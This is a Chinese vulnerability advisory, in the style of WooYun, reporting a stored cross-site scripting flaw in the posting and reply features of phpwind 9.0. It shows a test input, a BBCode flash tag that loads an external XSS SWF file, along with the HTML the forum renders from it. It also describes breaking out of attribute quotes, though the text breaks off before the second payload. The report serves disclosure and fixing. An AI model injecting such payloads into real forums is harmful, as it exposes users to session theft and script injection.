phpwind9.0最新版 富文本存储型XSS漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 没有阅读你们的代码,没有华丽的代码分析。只是黑盒测试…… ### 详细说明: 代码编写不当导致phpwind发帖和回复功能均可以由攻击者植入恶意的js代码进而进行跨站脚本攻击。下面附上测试步骤,已便乌云重现和官方修复: 注册账号,在任意板块进行发帖(切换到代码模式方便测试) 测试输入1: ``` [flash=480,400,0]http://businessinfo.co.uk/labs/xss/xss.swf[/flash] ``` 测试输出1: ``` <object type="application/x-shockwave-flash" data="http://businessinfo.co.uk/labs/xss/xss.swf" id="jp_audio_container_0" style="" height="400" width="480"><param name="movie" value="http://businessinfo.co.uk/labs/xss/xss.swf"><param name="allowFullScreen" value="true"><param name="autostart" value="true"><param name="loop" value="true"><param name="allownetworking" value="internal"><param name="allowscriptaccess" value="never"><param name="quality" value="high"><param name="wmode" value="transparent"><div style="height:100%">您还没有安装flash播放器,请点击<a href="http://www.adobe.com/go/getflash" target="_blank">这里</a>安装</div> </object> ``` 确定输出点后,尝试在flash的url中加入双引号跳出value=""和data=""。 测试输入2: ```...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息